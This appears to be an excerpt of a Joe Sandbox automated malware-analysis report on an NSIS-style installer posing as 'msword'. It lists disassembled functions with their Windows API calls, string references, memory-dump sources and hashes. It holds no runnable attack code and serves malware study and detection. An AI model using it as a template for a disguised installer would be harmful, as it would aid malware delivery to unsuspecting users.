                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                        • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                        • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                        • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                        Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                        • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                        • String ID:
                                                                        • API String ID: 4115351271-0
                                                                        • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                        • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                        • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                        • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                        Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                        • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                        • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                        • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                        Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                        • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                        • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                        • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                        Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                        • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                        • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                        • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                        Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherUser
                                                                        • String ID:
                                                                        • API String ID: 2492992576-0
                                                                        • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                        • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                        • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                        • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

                                                                        Non-executed Functions

                                                                        Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                        • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                        • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                        • DeleteObject.GDI32(?), ref: 00404A79
                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                        • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                        • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                        • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                        • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                        • String ID: $ @$M$N
                                                                        • API String ID: 1638840714-3479655940
                                                                        • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                        • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                        • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                        • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                        Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                        • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                        • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                        • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                        • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                        • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                          • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                          • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                        • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                        • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                        • String ID: 82D$@%F$@rD$A
                                                                        • API String ID: 3347642858-1086125096
                                                                        • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                        • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                        • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                        • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                        Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                        • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                        • API String ID: 1916479912-1189179171
                                                                        • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                        • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                        • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                        • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                        Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                        • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                        • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                        • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                        • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                        • FindClose.KERNEL32(?), ref: 00406E33
                                                                        Strings
                                                                        • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                        • \*.*, xrefs: 00406D03
                                                                        • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                        • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                        • API String ID: 2035342205-3294556389
                                                                        • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                        • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                        • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                        • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                        Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                        • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                        • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                        • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                        • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                        • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                        • API String ID: 3581403547-784952888
                                                                        • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                        • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                        • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                        • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                        Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                        Strings
                                                                        • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInstance
                                                                        • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                        • API String ID: 542301482-1377821865
                                                                        • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                        • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                        • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                        • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                        Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
